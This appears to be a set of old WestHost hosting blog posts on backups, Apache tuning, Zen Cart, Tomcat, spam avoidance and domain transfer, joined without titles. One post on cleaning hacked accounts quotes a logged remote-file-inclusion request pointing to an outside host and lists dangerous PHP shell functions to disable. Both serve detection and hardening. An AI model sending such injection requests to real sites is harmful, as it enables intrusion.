One of the indirect benefits of using a remote hosting provider is the ability to tap into ancillary services like Continuous Data Protection (CDP) that safeguards your data using the latest backup & restore technologies.

Traditionally IT departments running their own on-premise solutions have considered backup and disaster recovery to be two separate functions often handled by two different departments. This may have meant using a tape-based backup or a disk-based replication method, respectively.

With the rising surge of interest in cloud-based hosting to mitigate complexity, cut down costs and streamline business operations, there has also been the blossoming of new CDP technologies, which aims to protect your mission-critical data.

CDP unifies the goal of managing both backup and disaster recovery in one technical swoop. For instance, WestHost offers CDP as part of their preferred and business plans.

CDP allows rapid restoration of data in the face of some unplanned event or downtime.   While the technology is not exactly new it is becoming increasingly sophisticated and powerful, allowing hosting companies to offer this service to smaller SMBs, as well as larger enterprises, at much lower costs.

“Technologies such as compression and deduplication can decrease data traffic and significantly reduce bandwidth requirements and overall costs,” said eWeek.

Information System Security defines CDP as a process that let’s organizations continuously capture or track data modifications and stores changes independent of the primary data, enabling recovery from specific points in the past. CDP systems may be block, file-, or application-based and can provide fine granularities of restorable objects to infinitely variable points in time.

It is also becoming very popular in protecting the massive email threads generated in systems such as Exchange Server or other mission-critical email collaboration portals.

“New granular recovery technologies have emerged that enable mail messages, mailboxes, and folders to be restored individually without having to restore an entire email database, and without separate and redundant mailbox backups,” said Information System Security.

“In an Exchange environment, for example, only a single-pass full or incremental backup of Exchange is required, which dramatically decreases the time required to protect all mailboxes while also reducing the backup storage requirement. “

“In some situations, continuous data protection will require less space on backup media (usually disk) than traditional backup. Most continuous data protection solutions save byte or block-level differences rather than file-level differences. This means that if you change one byte of a 100 GB file, only the changed byte or block is backed up. Traditional incremental and differential backups make copies of entire files.”

If you are currently experiencing severe pain points dealing with data replication and disaster recovery you may find hosting that includes CDP is just what the doctor ordered!

I frequently cleaned cracked WestHost accounts, but sometimes they are not actually cracked or it’s a little hard to track down.

Here is a guide for what to look for if you think that something might be compromised. Some of this information is for WestHost accounts purchased before Nov. 2009, but I’ve included things to cover other accounts so it can translate into additional systems, platforms and hosts.

1. Location, Location, Location

Where is the malicious content initially found? 9 times out of 10 it’ll be in a sub-location of a specific PHP application. And that application is usually the one that was exploited.

2. PHP Variables

Below are common exploited functions within PHP. Ensure the below 3 are disabled if at all possible [or just enabled for the necessary directory].

Quick check of /etc/php.ini variables

disable_functions = passthru,proc_open,shell_exec,system //Ensure these are in the list
register_globals = Off
allow_url_fopen = Off
allow_url_include = Off

While shared accounts in the cPanel system do not have access to the server level php.ini file, you can utilize local PHP configuration files. Here’s a great link from to a forum post with information on how to do so: http://forums.westhost.com/showthread.php?t=14325

3. Modification Dates

What are the modification times on the files? This is very important as it lets you know how old the hack is. If you know when it was put there then you can examine log files for anything suspicious at that time.

4. Got POST?

Look for pages that have been posted to the most within Apache logs. Typically if there is a backdoor shell it’ll show up in the list.

5. Check for Strange Files in /tmp

This is a common location for crackers to stick scripts.

6. Check Your Process List for Anything Suspicious

If you see something, either install lsof and take a look at where it’s executing from or, contact us to check for you.
Shared cPanel users will likely just want to contact Technical Support.

7. Know Your Log Files

Do you know how to enable ftp logs? Where they are kept? bash_history? access_log’s? error_logs? Check them all.

cPanel provides access to the Apache log, but you can also trail system logs via SSH.

8. Run Some Command Line Checks

Run the command below and look for any strange GET requests.

awk -F ‘”‘ ‘{print $2}’ /var/log/httpd/access_log | grep -E ‘/?’ | less

Example: GET /domain.html/default/theme.php?THEME_DIR=http://www.getit.pl///opinia/Ckrid1.txt?? HTTP/1.1
GET /default/theme.php?THEME_DIR=http://www.getit.pl///opinia/Ckrid1.txt??

This command will work from the shared cPanel accounts.

9. Document

Always document everything you’ve seen and everything you find and everything you do. If you have backups to restore your site, ensure that you save a copy of the hacked files, remove their permissions, and let Tech Support run a final check of the files in question.

10. Google’s Your Friend

Chances are if someone has been hacked, it’s happened a million times over to others running the same application. Typically there are posts on possible entry points, etc.

11. Repetition, Repetition, Repetition

Hackers like to repeat things. Why? Because they use scripts to do their work for them. So if you find one instance check for others in other files.

I realize some of this may seem quite technical so please comment with your questions.

This could be expanded, but these steps are good places to check if you are worried about your account’s security. Have any other tricks you’d like to impart now?

There are essentially two reasons. First is the same reason that Pepsi pays $25 million for a thirty second Super Bowl ad: exposure equals sales. Secondly, they may want to cause you or your computer harm or somehow scam you.

So How Do They Get My Address?

Your address is acquired by spammers through a number of methods. Some of them actually just generate random addresses and send messages to those. If the mail goes through, then they assume it is valid and add it to their lists. These aren’t quite as common as other methods though, mainly because there are easier ways to get addresses that are known to have worked at some point in time. Some buy lists of addresses from places that collect them; for example you may register an account on some website that promises to email you an accurate horoscope each morning. They then could turn around and sell your address to an “affiliate.” One other method that is quite common and well disguised is sending and receiving chain mail.

Believe it or not, chain mail that you get and pass around is one of the key tools used by those who collect email addresses for nefarious purposes. How often do you get an email that shows the addresses of the fifteen other people it was sent to at the same time, and the fifteen before that, and so on? Over the course of one week, I was once able to collect a minimum of fifty unique email addresses every day. That amounted to a total of over 350 addresses!

I hate to break it to you, but most of those “prayer chains” and letters from soldiers and even those warnings about rapists in the Kmart parking lot were most likely written by a spammer. They put a lot of effort into compelling you to forward these to as many people as possible.

Another common trick they use is asking you to “make sure you send it back to me so that I know I am loved too!” This helps ensure that it eventually could be returned to the original author.

You Can Help Prevent This From Working!

I have put together 10 tips that you can use to drastically reduce the amount of SPAM that you receive, and better control what you do receive.

1. If you are sending an email to more than one person NEVER use cc (carbon copy) for the additional addresses. Instead use bcc (blind carbon copy;) it will stills end to everyone, but the recipient will only be able to see their own address.
2. When you are forwarding a message, delete all of the displayed addresses and signatures before you send it. Do everything to make it appear as if you originally composed the message. It is not only safer for those who sent it to you, but is also a courteous gesture.
3. If you do not recognize the sender of a message in your inbox or anything else looks odd about a message, DO NOT OPEN IT! Just delete it. If you feel the overwhelming urge to investigate it, put your email program into “Offline Mode” (you can usually do this in the File menu) before you look at it. If you are using webmail, just resist the urge.
4. Never click on a link inside an email message. Always copy and paste it directly into the address bar in your browser. No matter how “official” something looks, you should never trust it. That is how they run a type of scam called phishing which is used to get your personal information.
5. No matter how tantalizing a spam message looks, DO NOT OPEN IT! People looking at the ads are what keep spammers in business. To satisfy your curiosity, I have some information for you that I have gathered from very reliable sources:
   • You did not win the European lottery (when did you buy the ticket?) You didn’t even win a free Xbox.
   • You are not the 1 millionth anything.
   • PayPal does not need to confirm your password.
   • There is no member of the royal family from Mumbai who will be sending you $18,000.
   • No one needs your help with cashing their foreign money orders.
   • Bambi did not see your profile and think that you are cute (sorry!)
   • That missing girl in Texas was found eight years ago.
   • Microsoft, IBM, Yahoo, nor any other company will give you money just because your email address is on a chain letter.
   • And that sailor in Borneo who got decapitated because he “broke the chain” is still alive. His name is Roger and he runs a bait shop now. (You don’t believe me? Why would you believe those who wrote that story then?)
6. Use an address other than your personal one for anything online. If you don’t already have one, sign up for a free email address with Hotmail, Yahoo, or GMail. Reserve your real email address for only friends, family, and business.
   When registering for something online, do not sign up for the newsletter, do not check the box about receiving details about future promotions, and definitely do not allow their “affiliates” to contact you! And if you do find yourself on a mailing list, do not follow the “unsubscribe” link (remember tip #4!) Just mark it as junk and let your email program handle it.
7. To find out the truth about any story or claim in an email, you can research it on sites such as Snopes or Truth or Fiction. These sites contain large databases of researched facts about most common chain letters and email scams. Check out our previous post on exposing e-mail scams.
8. At no time will pressing shift or space immediately after forwarding a message cause the answer to a riddle, the final line of a poem, or a cute bunny to appear on your screen. There are thousands of types of email software, running on dozens of operating systems in hundreds of languages. There is no way to write an innocent email that causes such a thing to happen on all of those. If it does work, you now have bigger problems than just a spammer acquiring your address. It is time to run an anti-virus scan.
9. Always have a good anti-virus installed, updated, and running. If you don’t know which anti-virus you ought to use, ask a geek rather than a salesman. And if you think that you may have been infected, do not just rely on your local anti-virus. Also check your computer with an online scanner such as HouseCall.
10. Never post your address in a public forum; that is like putting up a sign that says “I want SPAM!” Instead, use a format like the following:
    “Please send your reply to my question to john123 at yourjob dot com.”
    While that isn’t fool proof, it can help. But better yet, just use the forum’s private messaging system if they have one.

Bonus tip for webmasters: Public whois information on your domain names is a good place for a spammer to get your email address. You can prevent this from happening by purchasing Domain Privacy.

By keeping yourself free from problems such as SPAM, viruses, phishing attacks and other such threats, you are also protecting your friends, family, and business contacts…anyone you send or receive email from. Remember, it wasn’t you who put your email address on that chain; it was the person who loves you enough to have sent it to you!

If you don’t follow these instructions and do not send a link to this article to everyone in your address book by the end of the day, you will receive twenty pieces of junk mail in your inbox every day for the next eight years! If you do follow these suggestions, then maybe, just maybe it will be less than that and you will be safer online. It worked for me!

One of the many site applications we offer is phpBB3, which claims to be “the most widely used open-source bulletin board system in the world.” Using phpBB3 you can create everything from large discussion forums to small game clan meeting rooms. It offers the tools necessary for moderation teams to maintain control of your site. A detailed permissions system also allows access to specific features as you see fit.

Perhaps the greatest aspect of phpBB3 is the ability to customize it by installing any of a number of available modifications. You’ll see a list of modifications later in the post, but first things first: Installation.

Unless you are familiar with the PHP coding language, installing these mods can be a daunting task. That’s where AutoMOD comes in! AutoMOD is a mod installation utility that will insert the necessary code into your phpBB3 site quickly and easily.

Five Steps to Install AutoMOD:

1. Upload all of the files and folders from the “upload” directory to your site with the FTP client of your choice. Ensure that you maintain the correct data structure, i.e., files in includes need to go in the includes folder on your site
2. Once the files are in place, browse to the install directory (http://www.yoursite.com/phpbb/install) to run through the simple and painless installation.
3. Don’t forget to delete the install folder from the server or phpBB3 will not allow anyone to use the site.
4. To install the mod, upload the mod files and let AutoMOD do the work!
5. After you upload your mod files into the newly created /phpbb/store/mods folder on the server, the mod will be displayed in the AutoMOD tab in the Administration Control Panel. Next to the name of the available mod is an “Install” link.

AutoMOD will check all of the code changes necessary and alert you if there is a problem; for example you may have already installed a mod that affects the specific code that the current mod needs to change. In this case, you will be shown the changes that are required for the current installation and you can make the choice to continue or cancel.

If there are any additional steps needed to complete the installation, AutoMOD will tell you exactly what’s needed. If you decide in the future that you don’t want the changes implemented by a particular mod, AutoMOD can remove it for you as well. How cool is that!

There are literally hundreds of phpBB3 modifications available. The official phpBB site hosts over 300 mods alone, all of which have been reviewed for security flaws and obvious bugs. You can transform phpBB3 from a simple bulletin board system into a feature rich content management system, a near LinkedIn clone, or even a blog.

Here are some of the more common and useful mods you may wish to look at:

• Advertisement Management: Manage your banner ads, create rotating ads & filter viewers of advertisements
• User Blog Mod: Feature rich blogging system that can be available to all of your site members
• phpBB Smartfeed: Creates RSS 1.0, 2.0, and ATOM 1.0 newsfeeds so you can syndicate your site contents
• SEO Mod: Optimize your phpBB3 site’s ability to gain ranking within search engines
• phpBB3 Portal: Add a front portal page to your forum, effectively converting phpBB3 into a full CMS

With all of these mods at your fingertips, the Internet is your oyster!

Cody Erekson
WestHost Technical Support

I think it is safe to say that the majority of computer users, at one time or another, and to one degree or another, has had that moment where we wished we had made a backup of our files—but hadn’t. I don’t believe that an in-depth explanation is required to illustrate why this is a good idea, and that we can all agree that this is something that we should periodically do to avoid that “I wish I made a backup” moment.

While it may seem obvious that you would do this on your personal computer; the files on your Westhost account are no exception. It is just as easy to remove or overwrite a file or an entire directory on your Westhost account. The frequency in which you do this is going to depend on your site; you must decide on the regularity that you perform the backup. There are multiple ways that you can perform the backup of your site, the easiest and most popular method I will describe below.

Site Backup

Take inventory of your account

This will give you an idea of what you are going to back up if for whatever reason you are unsure. The easiest way to do this is to access your Site Manager (http://yourdomain.com/manager) > Install & Manage Applications. This will give you a snapshot of the applications that you have installed and what you will be backing up.

Install FTP program

You are going to want to install an FTP program on your computer to download the backup that you will create. FTP stands for File Transfer Protocol and is going to be the method with which you download your backup from the Westhost server to your computer. There are many FTP programs out there that you can use ranging from free to programs that you must purchase. For the purposes of this instruction, I will be using FileZilla as it is compatible with both Windows and Mac platforms. You can download FileZilla for free here.

To set up FileZilla, you will want to follow the Westhost documentation that has been provided here. Setup instructions for other FTP programs can also be found in the Westhost documentation.

Zip up site directory

It is possible to download the entire site directory file by file, but this results in long download times and is overall inefficient. The preferred way to back up your site is to “zip up” your site’s home directory into one single zipped file, and then download the one file. To zip up your sites directory follow these steps:

1. Open up the File Manager (http://yourdomainname.com/fm) and log in with your Site Manager username and password
2. Upon logging in, you will be placed inside your primary domain’s directory (/var/www/html). In order to zip up the /html directory, you will need to go up one directory (/var/www). You can do this by simply clicking “up one dir” at the top of the directory list.



3. It’s important that you are in this directory; otherwise, the below command will not work. Now that you’re in the appropriate directory, you will issue the zip command by first clicking “Execute a Command” at the top right of the screen.
4. Type in this command where it says Enter Shell Command:

   tar -zcvf yourdomain.com-YYYY-MM-DD.tgz html/



5. Hit Submit and this will initiate the backup process. This may take a while depending on how big your directory is. So don’t be alarmed if it appears as if it isn’t doing anything. When it is finished it will output a long list of files that it archived.

Download backup

Now that you have successfully zipped your directory backup, you are ready to download it. Open up FileZilla and connect to the server by following the instructions outlined in the Westhost documentation.

When you open up FileZilla, you are going to see a local side (your computer) on the left and a remote side (your server) on the right. By default you will be placed in the upper-most directory on your server “/” or what is known as the root of your server. You will need to browse to the location where the backup was made. On the top-right pane of FileZilla, browse to /var/www and you should see the backup that you created in the bottom-right pane. Simply drag the backup file (yourdomainname.com-YYYY-MM-DD.tgz) over to the left-hand pane of your FileZilla which is your local computer. This will initiate the download and, once again, can take awhile depending on how large the backup is. The progress meter at the bottom of the screen should give you an idea when the download will be finished.

Database Backup

The backup that we performed is going to back up your Web site’s files, but if your Web site uses applications such as WordPress, Joomla, Drupal, or any other application that delivers dynamic content, you are going to have a database that you will want to backup as well. The databases that these applications use are going to store all of your blog posts, application settings, users, etc. Simply put, applications that use a database will not function without it. That said, it is equally important to back up the database as it is to back up the site files.

You will most likely already know if you have an application that uses a database after taking inventory of your site earlier on step one. If you have determined that you use a database, follow these steps to make a backup of the database. At any rate, it would be a good idea to follow the below steps to be absolutely sure that you’re backing up a database if you have one.

Install phpMyAdmin

phpMyAdmin is a database management application that will allow you to export your database. To install this (if not installed already), go to Site Manager > Install & Manage Applications. phpMyAdmin is going be under the Development sub section and will be highlighted blue if already installed. Once it’s installed, click on the phpMyAdmin name and it will give you a link to the phpMyAdmin login.

Once logged in (you will need to use your Site Manager username and password), you will see the main page for phpMyAdmin. On the left you will see a list of all your databases. From this list, you will be able to identify quite easily databases that your site uses (databases like mysql, test, and information_schema are there by default and generally don’t need to be backed up). To make a backup of each database, you will need to follow the below process.

1. Click on the database on the left
2. Click on Export (towards the top)
3. Scroll down to the bottom and check “Save as file”
4. Click Go (opens window prompting you choose a location to save the exported database on your computer)

This will export the database in SQL format which is the standard format for databases. Repeat this export for your other databases as necessary.

Once you have made the backup of your site files and the database, you can rest assured that you have something to fall back on if in case, you encounter one of the would-be “I wish I made a backup” moments.

Even to most Internet professionals, the Apache web server software can be as perplexing as it is ubiquitous. Although not as comprehensive as the official 685-page documentation, this post outlines two useful features you can enable in the httpd.conf file to improve the performance of your web server: persistent connections and gzip compression.

Important note: An error in your Apache configuration can take all of your web sites offline. Please make a backup copy of the /etc/httpd/conf/httpd.conf file before you begin making modifications. Also remember that it is necessary to restart your account to apply either of the changes described below.

Persistent Connections (Keep-Alive)

In addition to your web page itself, web browsers must also download each stylesheet, script, image, and other file referenced by your page. Historically, this meant that browsers would connect to a server, download the page, and disconnect. The browser would then initiate a new connection, download the first referenced file, and disconnect, repeating the process to fetch each additional file. As web pages became increasingly complex, they began using more files and the slow connect/download/disconnect method became noticeably time-consuming. This problem was solved with the introduction of persistent connections, as described below in the Apache documentation:

The Keep-Alive extension to HTTP/1.0 and the persistent connection feature of HTTP/1.1 provide long-lived HTTP sessions which allow multiple requests to be sent over the same TCP connection. In some cases this has been shown to result in an almost 50% speedup in latency times for HTML documents with many images.

Under the default settings, persistent connections are enabled on your account, but the KeepAliveTimeout is set to 15 seconds (near line 86 of /etc/httpd/conf/httpd.conf). This means that Apache connections will stay active for 15 seconds after visitors have downloaded (and possibly even left) the web page. Apache connections use server resources and your account has a limited number of Apache connections, so this is generally undesirable.

• For the best performance on most websites, leave KeepAlive On but reduce the KeepAliveTimeout to 1 or 2 seconds. This allows visitors to benefit from faster downloads through persistent connections, but helps prevent Apache from overloading the server and keeping too many connections open at once.
• In rare cases, on websites with extremely heavy traffic, turn KeepAlive Off. Persistent connections guarantee faster page loads for your visitors but come at the cost of increased resource utilization by requiring more Apache connections to remain open concurrently on the server. If you are frequently reaching the maximum number of allowed Apache connections, it is probably necessary to upgrade your hosting package, but turning off persistent connections is one final step you can take to squeeze a little bit more out of your current plan.

Gzip Compression (mod_deflate)

HTML, CSS, and many other programming languages used on the web are highly redundant, allowing them to be compressed effectively. mod_deflate, Apache’s compression engine, is installed but not enabled by default. To enable automatic gzip compression, add the following lines of code to the end of your httpd.conf file:


SetInputFilter DEFLATE
AddOutputFilterByType DEFLATE text/html
AddOutputFilterByType DEFLATE text/css
AddOutputFilterByType DEFLATE text/xml
AddOutputFilterByType DEFLATE text/plain
AddOutputFilterByType DEFLATE text/rtf
AddOutputFilterByType DEFLATE text/javascript
AddOutputFilterByType DEFLATE application/x-javascript
AddOutputFilterByType DEFLATE application/xml
AddOutputFilterByType DEFLATE application/xhtml+xml
AddOutputFilterByType DEFLATE application/rss+xml
AddOutputFilterByType DEFLATE application/atom+xml
AddOutputFilterByType DEFLATE application/rdf+xml
AddOutputFilterByType DEFLATE application/postscript
AddOutputFilterByType DEFLATE application/msword
AddOutputFilterByType DEFLATE application/vnd.ms-excel
AddOutputFilterByType DEFLATE application/vnd.ms-powerpoint
AddOutputFilterByType DEFLATE image/svg+xml
AddType image/svg+xml .svg


After you have edited the httpd.conf file and restarted your account, test whether compression is working properly.

Persistent connections significantly improve loading multimedia-rich sites with large numbers of images and other files, while gzip compression reduces HTML, CSS, JavaScript, and other text by an average of 80 percent, but these two changes are just the beginning! Read Yahoo’s list of Best Practices for Speeding Up Your Web Site for even more ways to make your pages load faster.

In part one of customizing Zen Cart (found here) we covered changing the color scheme of your store to better fit your needs. In part two we will be discussing changing some of the main images that Zen Cart uses in the design.

Changing Images

The first image you might want to get rid of is the main banner image and replace it with your own. The main banner is actually made up of two parts. The first part is the clouds image. This is referenced again in the CSS file that you have already edited. The CSS file looks like this:

#logoWrapper{
background-image: url(../images/header_bg.jpg);
background-repeat: repeat-x;
background-color: #ffffff;
height:75px;
}

To remove the clouds image, you simply removed the reference to the image:

#logoWrapper{
background-repeat: repeat-x;
background-color: #ffffff;
height:75px;
}

By default Zen Cart uses logo.gif for the name of this image, but you can use you own filename for the logo. Using an image editor, create your new logo and upload it to your server.

After creating your logo you can adjust the height, width and logo name in includes/languages/english/header.php. Also, you will have to change includes/languages/english/classic/header.php.

define('HEADER_ALT_TEXT', 'Powered by Zen Cart :: The Art of E-Commerce');
define('HEADER_LOGO_WIDTH', '192px');
define('HEADER_LOGO_HEIGHT', '64px');
define('HEADER_LOGO_IMAGE', 'logo.gif');

Make the needed changes reflecting the name of your site, and the width, height and filename of your logo that you created. To get rid of that pesky “Sales Message Goes Here” text, you need to modify the header.php file in the path /var/www/var/zencart/includes/languages/english/classic/ .
The rest of the images on the site are banners and those banners can be turned on, off, or deleted. You can do this through the admin panel for your cart. After your images have been modified, your cart should look something like this:

Congratulations, you are well on you way to creating a shopping cart that will fit your site’s personality.

—————————–

Would you like to perform the above (or more) on your site, but not comfortable with the code? WestHost can help, just fill out a request here.

One of our more recent Site Application additions has been Zen Cart. This e-commerce solution has many robust features and this article will give some detailed information, giving you the ability to modify the cart with your own look and feel.

The first thing you might want to do to your new store is to modify the CSS to provide the “feel” you are looking for. The templates are located in zencart/includes/templates/. One thing that is of special interest is that Zen Cart has two templates it starts by default. There is the classic template and there is the template_default template. Zen Cart will use the template_default template for most of its features, but any changes to the classic template will override the template_default template. The template_default will render the default CSS and basically is the configuration Zen Cart will have if there were no template installed. For the purposes of this post, we’ll talk about making changes to the classic template as it is in place after the installation from Site Manager. The classic template can be found in zencart/includes/templates/classic/css/.. You want to modify the file called stylesheet.css.

Common things I often asked are how colors, widths, heights, and images are changed. The first thing I will start with is the overall color scheme of your store. Your store will look like this when it is first loaded.

Color Schemes

Many ask how to change the green color scheme. To do this, we have to modify the CSS file located in zencart/includes/templates/classic/css/ called stylesheet.css. The green headers are actually small gif images that are referenced in the CSS file. They can be deleted or changed. I have highlighted the specific text in my example below.

#navMainWrapper, #navSuppWrapper, #navCatTabsWrapper {
margin: 0em;
background-color: #abbbd3;
background-image: url(../images/tile_back.gif);
padding: 0.5em 0.2em;
font-weight: bold;
color: #ffffff;
height: 1%;
}

In my example below you can see that the reference to the image has been removed and I have changed the background color to blue.

#navMainWrapper, #navSuppWrapper, #navCatTabsWrapper {
margin: 0em;
background-color: #000CFF;
padding: 0.5em 0.2em;
font-weight: bold;
color: #ffffff;
height: 1%;
}

The image is referenced in four other tags throughout the CSS file. To completely change this look, you will need to remove or possibly change the reference. The tags that need to be changed are listed below. Simply look for the exact tags in the file and remove the image reference.

#navMainWrapper, #navSuppWrapper, #navCatTabsWrapper {
#navEZPagesTop {
.leftBoxHeading, .centerBoxHeading, .rightBoxHeading {
.productListing-rowheading {

It would probably be a good time to save your changes and take a look at the impact you have had on Zen Cart. Save your work and take a look at your cart in your browser. For those of you falling asleep at this point, you may need to hit refresh in your browser. Now, you may notice some throwbacks to the green theme at the bottom of each element in the browser. You can change this heavy green line by modifying the CSS file on the lines outlined below.

.leftBoxContainer, .rightBoxContainer {
margin: 0em;
border: 1px solid #9a9a9a;
border-bottom: 5px solid #336633;
margin-top: 1.5em;
}

If you want to make the width the same as the rest of the lines and change the color of the borders to match your header, you would set to it something like this:

.leftBoxContainer, .rightBoxContainer {
margin: 0em;
border: 1px solid #000CFF;
margin-top: 1.5em;
}

Now the store should look something like this:

Read Customizing Zen Cart Part 2 by clicking here.

—————————–

Would you like to perform the above (or more) on your site, but not comfortable with the code? WestHost can help, just fill out a request here.

To all Tomcat users out there, I’m sure many of you have had questions on how to get things up and running; questions like ‘Is Apache Tomcat the same thing as Tomcat?’, and ‘How do I get the :8080 to go away?’

What is Apache Tomcat?

Apache Tomcat and Tomcat are the same thing. Apache, in this case, is simply the parent project and does not refer to the Apache web server. Apache Tomcat acts as a servlet container that processes Java servlets/JSP pages. There are some specifications that can be made within the Apache web server to let Apache know whether or not to handle the request or pass it on to Tomcat for processing. These specifications are located in the mod_jk.conf (sometimes just jk.conf) file in the /etc/httpd/conf.d directory.

Great! So how do I get Apache Tomcat to find my JSP pages?

While a number of specifications can take place in the mod_jk.conf file, the most relevant is the JkMount directive. This is the option that tells Apache whether or not to pass the request on to Tomcat. If you create a new folder in the /var/tomcat5/webapps directory for your Java related content, which is where is should be, Apache will not know about it by default. If the folder is called ‘test’, for example, then you would be able to access the folder by going to http://yourdomain.com:8080/test/ but it would not work by going to just http://domain.com/test/ which is, of course, what most of you will want. To get this functionality, a JkMount directive would have to be used inside the jk.conf file. It would look as follows:

JkMount /test/* ajp13w

Once this change is made and Apache is restarted (notice, Tomcat does NOT need restarting in this case because it was an Apache directive in an Apache configuration file that was altered) then http://yourdomain.com/test/ will come up fine and will be handled by Tomcat, as desired. If you are familiar with SSH, you can use the ‘apachectl graceful’ command to restart Apache. Otherwise you can go in through your Site Manager under the Restart Account section and restart that way.

What if I want my Java web application to show up at http://yourdomain.com instead of http://yourdomain.com/folder/?

In this scenario, you will create a folder called ROOT (all upper case) inside the /var/tomcat5/webapps directory and put all of your java content in there. You will then setup the JkMount directive as follows and then restart Apache as mentioned above:

JkMount /* ajp13w

Now your Java web application is all up and running. That’s all it takes!

A few more tidbits for those who want to understand what all that means:

The ‘ajp13w’ entry above refers to a user specified in the /etc/httpd/conf/workers.properties file and stands for Apache JServ Protocol. To find out more on this protocol and its functions, see http://tomcat.apache.org/connectors-doc/ajp/ajpv13a.html. That should give you a good understanding of what role a Tomcat worker plays and how and why Tomcat processes are spawned and resources are used. A Tomcat worker is a Tomcat instance that is waiting to execute servlets or any other content on behalf of some web server. For example, we can have a web server such as Apache forwarding servlet requests to a Tomcat process (the worker) running behind it. In WestHost’s case, ajp13 and ajp12 are the only workers setup, ajp13 being the default worker, and the preferred worker due to it being configured to use sockets as it’s communication channel (see above link for further detail.) When the JkMount directive is used, it is assigned to the ajp13 worker as the entry specifies.

Web hosting clients often find themselves transferring an existing domain as well as signing up for a new hosting account. In order to simplify the process, here are 3 easy steps to use as a guideline:

How to transfer a domain to WestHost:

1. EPP authorization code:
   Obtain the EPP code for your domain from your current registrar. Then either enter the code in the “note” section of the order form, or e-mail the EPP code to domainreg@westhost.com. You should also double check that your e-mail address under the WHOIS information is valid. Also, you will need to contact your current registrar within 24 hours of the transfer to remove the lock from your domain.
2. Fill out the transfer order form:
   • Step 1: Choose “Transfer Your Existing Domain” and select the duration length
   • Step 2: Choose a hosting plan, or skip if you already have a hosting plan with WestHost
   • Step 3: Fill out the rest of the form
3. Change DNS records:
   Once we have completed the transfer process you will receive an e-mail from us with your login information. This e-mail will contain important information regarding your DNS records. We recommend changing your DNS prior to the transfer, or right after it is completed; so that your domain is pointing to our servers.

NOTE:

In order to ensure a successful domain transfer from your current registrar, make sure your domain:

1. Has not expired, or will not be expiring within 14 days (If it’s past the due date, you’ll have to renew with the current registrar)
2. Has not been renewed within the last 45 days
3. Has not been registered within the last 60 days
4. Is not involved in any legal or payment disputes

Finally, after everything is submitted, the actual transfer could take 7-14 days to complete. Your site will not experience any downtime during this process. However, your site will experience downtime when changing the DNS records and the change could take up to 24 hours to propagate.

You can also visit our Domain Registration page in order to find out more details.

Glossary:

EPP Code: An Authorization Code (EPP Code) provides security for the domain name registration. Each domain name has its own code and is assigned by the registrar at the time the domain name is registered.

DNS: Domain Name Servers are used for translating domain names to IP addresses. They also include the domain name’s name server and mail server information.